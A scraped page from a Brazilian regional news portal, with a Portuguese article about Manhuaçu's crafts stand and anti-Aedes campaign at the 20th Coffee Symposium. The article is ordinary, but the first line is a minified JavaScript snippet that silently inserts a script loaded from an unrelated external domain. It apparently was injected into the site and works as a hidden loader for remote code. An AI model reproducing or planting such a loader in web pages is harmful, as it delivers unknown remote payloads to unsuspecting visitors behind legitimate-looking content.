;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Estande de artesanato é sucesso no simpósio de cafeicultura. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Estande de artesanato é sucesso no simpósio de cafeicultura.

Produtos de artesanato, materiais recicláveis reutilizados, doces caseiros e outras guloseimas estão entre as atrações do estande montado pelo Governo de Manhuaçu, por meio da Secretaria de Cultura e Turismo, no 20º Simpósio de Cafeicultura.

O evento, organizado pela ACIAM – Associação Comercial, Industrial e Agropecuária de Manhuaçu, foi aberto na terça-feira, 15, e prossegue ainda até esta sexta-feira, 18, na área do Parque de Exposições, na Ponta da Aldeia. Além de palestras e workshops, o Simpósio, consolidado como um dos principais eventos do ramo no estado, traz em sua programação, feira com novidades e outras atrações.

No stand da P refeitura de Manhuaçu no Simpósio de Cafeicultura, são encontrados diversos artigos de produção artesanal, seja para enfeites, uso no dia a dia ou para saborear. Todos os produtos são dos artesãos apoiados pelo Governo de Manhuaçu, que participam do Espaço Cultural Só Arte, que fica na Praça Doutor Cesar Leite, diariamente.

ESPAÇO CONTRA O AEDES

Além dos produtos de artesanato, o stand da Prefeitura de Manhuaçu tem espaço também para a campanha contra o Aedes. Agentes de combate ao mosquito distribuem panfleto e apresentam informações sobre o transmissor da Dengue, Chikungunya e do vírus Zika. No stand também estão expostos equipamentos usados no dia-a-dia para eliminação dos focos nas visitas residenciais.

EVENTO VALORIZADO

O Simpósio de Cafeicultura tem entrada gratuita nas palestras e visitação aos stands. O horário de funcionamento é durante o dia, entre nove horas da manhã até o final da tarde. Na abertura, na terça-feira, foi consenso entre os discursos a importância da cafeicultura, que mantêm toda uma região ativa e pulsante economicamente, enquanto o país atravessa um árduo período de recessão.

O Prefeito Nailton Heringer, que também é cafeicultor, destacou na abertura do evento a importância do simpósio nesses vinte anos. “Temos produzido os melhores cafés do país, exportamos para as melhores cafeterias da Europa, principalmente Alemanha e Bélgica” – comenta o chefe do Executivo. “Isso é apenas uma amostra do quanto crescemos. Mais uma prova disso é o tamanho desse simpósio, da relevância dele. Manhuaçu hospeda um dos maiores eventos da cafeicultura do país” – enaltece Heringer.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.